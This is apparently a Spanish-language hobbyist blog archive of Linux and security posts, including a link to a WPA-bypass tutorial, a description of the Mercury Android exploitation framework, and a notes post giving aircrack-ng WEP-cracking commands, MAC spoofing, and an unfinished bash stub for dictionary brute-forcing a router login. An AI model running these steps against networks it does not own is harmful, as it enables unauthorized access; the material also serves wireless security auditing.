RSS

Archivo de la categoría: LINUX

REGALOS PARA NAVIDAD 2015

 

 

El pase de diapositivas requiere JavaScript.



Anuncios
 
Deja un comentario

Publicado por en 1 diciembre, 2015 en LINUX

 

Etiquetas: , ,

ENLACES UTILIDADES Y AMIGOS

A MODO DE POST IT ESTA ENTRADA, YA QUE HAY OCASIONES DONDE NO ESTA CONMIGO UNA PC Y RECORDAR CADA LINK SE ME HACE COMPLICADO, NO SOY RESPONSABLE DEL CONTENIDO.

1.- LISTA DE URL DE BLOGS INTERESANTES

LINCEUS

LINUXITO

CÓDIGO

MAESTROS DE LA COMPUTACION

EL EVANGELISTA

2.- LISTA DE URL DE DONDE BAJAR INFORMACION INTERESANTE

GRATIS PROGRAMAS

IDEAS FOR PC

3.- LISTA DE URL DE DISEÑO

MAGAZINE

IMAGENES VECTORES

TEXTURAS

ICONOS

FREEPIK

4.- PELICULAS ONLINE

YASKE

 
1 comentario

Publicado por en 23 noviembre, 2013 en LINUX

 
Imagen

HISTORIA DEL HACKING

a-short-histoy-of-hacking_5029114bd04c6_w587

 
Deja un comentario

Publicado por en 22 mayo, 2013 en LINUX

 

SALTANDO EL WPA

BUENO PARA LOS INTERESADOS COMO YO AQUI UN BUEN DOCUMENTO Y TUTORIAL SOBRE COMO SALTAR EL WPA. WIRELESS ESTAS PERDIENDO.

WPA ESQUEMA

PDF: DOCUMENTACIÓN

ALGUNOS TUTORIALES CON BACKTRACK  DE LA MANO DE ANTRAX

 
Deja un comentario

Publicado por en 25 febrero, 2013 en LINUX

 

EXPLORANDO VULNERABILIDADES ANDROID CON MERCURY

mercury

Mercury es un framework para explorar la plataforma Android, para encontrar vulnerabilidades y exploits.

Mercury permite asumir el papel de una aplicación con privilegios bajos en Android,  para interactuar con las aplicaciones asi como con el sistema operativo.

  • Utiliza un análisis dinámico de las aplicaciones de Android y los dispositivos de seguridad para las evaluaciones rápidas.
  • Comparte métodos públicamente conocidos de explotación en Android y hazañas prueba de concepto para aplicaciones y dispositivos.
  • Escribir pruebas personalizadas y hazañas, utilizando la interfaz de extensiones de fácil

Mercury permite:

  1. Interactuar con los 4 criterios de valoración de la IPC – Actividades, receptores de radiodifusión, proveedores de contenidos y servicios.
  2. Usa una cubierta adecuada que le permite jugar con el sistema operativo subyacente Linux desde el punto de vista de una aplicación sin privilegios (usted se sorprenderá de lo mucho que se puede ver).
  3. Encuentre información sobre los paquetes instalados con filtros de búsqueda opcionales que permiten un mejor control.
  4. Construcción de comandos que se pueden comprobar los vectores de ataque de  las aplicaciones en las aplicaciones instaladas.
  5. Transferir archivos entre el dispositivo y el ordenador Android.
  6. Crear nuevos módulos de explotación en su último hallazgo en Android, y jugar con los que otros han encontrado.

Mercurio hace todo esto a través de la red: no requiere de ADB.

Mayor Información

 
Deja un comentario

Publicado por en 16 enero, 2013 en ANDROID, LINUX

 

BACK TRACK R3 Y ARDUINO

-¡Si! Es una gran sorpresa , ¡Arduino con Backtrack  xd!, Ahora los desarrolladores de Bt añadierón herramientas de testeo y manejo de Hardware.

BackTrack 5 Release 3, la popular distro Linux de  seguridad  ahora incluye soporte para Hardware.

Released at last month’s Black Hat and DefCon, BackTrack 5 Release 3 includes over 60 new security tools. It also fixes vulnerabilities in the previous releases.

New is software specific for the Arduino and the Kautilya toolkits, the latter includes payloads for the Teensy USB development board.

La Distro BT R3 Añade una nueva categoría denominada “Explotación física” enfocada a hacer prueba con hardware. Incluye librerías y un IDE para Arduino y el toolkit Kautilya para hacer pruebas de cargas útiles sobre un dispositivo Teensy (Dispositivo de almacenaje de Datos exactamente rutinas de comandos que se envian por medio del puerto USB hacia la Pc donde se deja la Usb modificada y este ejerce una serie de parametros por medio del puerto del Teclado sentencias de comando)

Así también se  sigue depurando la distro para hacerla fácil de actualizar, mayor estabilidad e integrando mejor todos los kit de herramientas disponibles ahora basados en la distribución Ubuntu.

En pocas palabras podemos conectar una llave USB al equipo que se quiere interceptar, ingresa rutinas de Teclado para verificar algunos datos o aperturar shells.

Ya tengo algunos escrips que escribir Xd todo en pro del conocimiento anti atake.

 
Deja un comentario

Publicado por en 20 noviembre, 2012 en ARDUINO, LINUX

 

Etiquetas: , ,

AUDITORIA WIRELESS BACK TRACK 5 R2

ESTA CATEGORIA LA APERTURO A MODO DE APUNTE DE NOTAS PERSONALES. EN LAS QUE TRABAJO Y JUEGO CON ELLAS. SI CONTRIBUYE EN EL APRENDIZAJE PUES MÁS QUE SATISFECHO.

BACK TRACK.- ES UN LINUX DIRECCIONADO A TAREAS DE TESTEO, RUPTURA CON UNA INFINIDAD DE TOOLS. PARA QUIENES ESTAMOS METIDOS EN EL MUNDO DEL WIRELESS ES LA LLAVE DEL CERRAJERO.

AUDITORÍA BÁSICA A UN ACCESS POINT (AP)

SEGURIDAD IMPLEMENTADA WEP 

REQUERIMIENTOS

1,. ANTENA RECEPTORA TRANSMISORA: INYECCIÓN DE PAQUETES

     ALFA NETWORK 802.11b/g Long – Range Wireless USB Adapter MODEL: AWUS036H  MADE IN TAIWAN.

     WWW.ALFA.COM.TW

2.- BACK TRACK R2

3.- COMANDOS

     LÍNEA DE COMANDO 01

    > airmon-ng //despliegue de adaptadores de red

    > airmon-ng start wlan0 // cambio a modo monitor

    > airodump-ng mon0 “Parar con Ctrl + c” //

Escaneo de Redes Inalámbricas en todos los canales del espectro  del rango 2.4 Ghz.

    > airodump-ng -c <Numero de Canal del Ap a Auditar> -b <Número de Mac de Ap a Auditar> -w <Nombre de  Archivo> mon0

LÍNEA DE COMANDO 02

Autentificación de la Antena Alfa al Ap a Auditar

aireplay-ng -1 0 -a <Número Mac Ap> mon0

aireplay-ng -3 -b <Número Mac Ap> mon0 //obtiene los Paquetes para poder decodificarlos

LÍNEA DE COMANDO 03

>airplay-ng -0 0 -a <Número Mac Ap> mon0 // Proceso para aumentar los datos

Cuando se tenga una gran cantidad de Data 40.000 de Data se procede con el Siguiente Comando.

airecrack-ng <Nombre de Archivo>-01.cap Con este comando se selecciona la información capturada y se decodifica mostrandonos la contraseña de acceso.

CAMBIAR NÚMERO DE MAC EN WIRELESS

> ifconfig wlan0 down

> macchanger –mac 00:11:22:33:44:55 wlan0

> macchanger -s wlan0 // Verifica el valor de la Mac

> Ayuda del Comando Mac:

macchanger –help / man -k mac

CAMBIAR NUMERO DE MAC EN ETHERNET

Primero lo primero, ser root:

$ sudo -s

metemos el pasword *****

#ifconfig eth0 down

Para desactivar nuestra interfaz de red por cable, hay que tener cuidado porque los programas como network manager o de ese estilo inmediatamente vuelven a activar la interfaz, hay que desactivar o quitar estos programitas un ratito ok?

Si ya estamos como root, nuestra consola cambiará de signo, ya no será “$” sino que cambia el símbolo por un “#”, introducimos la siguiente línea en la consola:

#ifconfig eth0 hw ether xx:xx:xx:xx:xx:xx

ifconfig es el comando que nos permite juguetear con las interfaces de red

eth0 es el nombre de la interfaz de red a la que le vamos a cambiar la MAC, en este caso la de ethernet, si fuera la inalámbrica puede ser wlan0 o ath0, etc, pero al parecer solo soporta ethernet.

hw es el comando que nos permite cambia la mac

ether es la clase de la interfaz que estamos modificando en este caso ethernet

xx:xx:xx:xx:xx:xx es la dirección mac que queremos!!

si no nos arroja ningún error pues activamos la interfaz de nuevo con lo siguiente:

#ifconfig eth0 up

HERRAMIENTA 01 

NAVEGADOR WEB POR LÍNEA DE COMANDO ELINKS

CONCEPTO

PEQUEÑA APLICACIÓN PARA LA LÍNEA DE COMANDOS, ES UN NAVEGADOR WEB. YA IMAGINAN LA CANTIDAD DE OPCIONES QUE SE TIENEN PARA PODER PROBAR A FUERZA BRUTA LAS CONTRASEÑAS QUE TENGAMOS EN ALGUN DICCIONARIO. SIEMPRE Y CUANDO EL DISPOSITIVO NO TENGA ACTIVO  TELNET. ES SIMPLEMENTE FÉNOMENAL. LA PODEMOS USAR PARA ROMPER LA CLAVE DEL ROUTER LUEGO DE INGRESAR A LA RED DEL AP AUDITADO. XD.
Y SI TENEMOS UN SCRIPT  VIA BASH.

INSTALACIÓN

01 > Press CTRL+ALT+T to run the terminal, then run this command:

02 > sudo apt-get install elinks
To make ELinks support images, you need to install feh by executing this command:
03 > sudo apt-get install feh
For PDF support, you need to install fbi:
04 > sudo apt-get install fbi

ELinks is a rapid and light console web browser. It supports tabbed browsing, cookies, bookmarks, menus, etc. There is also a support for images and PDF files. The mouse can also be used with this console web browser.

CONFIGURACIÓN

To run ELinks, open Applications >> Internet >> ELinks Web Browser, or open the terminal, then run this command:
05 > elinks

Press Esc key two times to display ELinks menu. To configure the terminal, open Setup >> Terminal options.
ELinks Use
Here is some ELinks keyboard shortcuts:
g: Open address bar.
up/down arrows: To scroll up and down – Use them if you don’t have a scroll wheel.
left arrow: Previous page.
u: Next page.
A click with the mouse wheel: Open link in a new tab.
t: Open new tab.
c: Close current tab.
CTRL+R: Reload current page.
q: Exit ELinks.
Managing bookmarks
Press:
a: To add current URL to bookmarks.
s: Open Bookmark manager.
To move a bookmark, select it first with Insert key, an asterisk appears, move  your cursor in the folder or the place you want to move your bookmark to, then click Move.

HERRAMIENTA 02

TELNET

01 > Press CTRL+ALT+T to run the terminal, then run this command:

02 > sudo apt-get install telnet

HERRAMIENTA 03

EXPECT

01 > Press CTRL+ALT+T to run the terminal, then run this command:

02 > sudo apt-get install expect

AHORA LO QUE FALTA ES HACER UN PEQUEÑO PROGRAMA VIA SCRIPT PARA BASH PARA LANZAR LOS COMANDOS

EDITANDO EL PROGRAMA

1> Click derecho sobre el escritorio de Ubuntu | Crear un nuevo documento | Documento Vacio
2> Ingresamos la estructura del programa
PROGRAMA
#/bin/bash
clear
echo “IMPLEMENTACIÓN DE SRIPT PARA PROBAR POR FUERZA BRUTA EL INGRESO AL AP AUDITADO”
echo “Autor Jimy Espinoza – Nombre Script: Neutron Version 1.0”
slepp 5
elinks 192.168.1.1
//falta indicar el proceso de ejecución de la accion de oprimir la tecla enter
//mandar a escribir el usuario
//mandar a escribir la accion de la tecla
//mandar a escribir la contraseña
//mandar a escribir la tecla tab
//mandar a ejecutar repetitivamente las acciones mediante un diccionario
3> Guardamos el archivo, establecemos el nombre y la extensión  .sh

EDITANTO LOS PERMISOS EN LA TERMINAL

1> echo $shell  //verifica el shell que estamos usando
2> Ubicamos el archivo via terminal y definimos los permisos correspondientes
     chmod u+x nombreprograma.sh
3> Iniciamos vía terminal el programa
     sh nombreprograma.sh

[ sourcecode language=”php” ]

[ /sourcecode ]

 
Deja un comentario

Publicado por en 20 noviembre, 2012 en ANTENAS, LINUX, SISTEMAS INALÁMBRICOS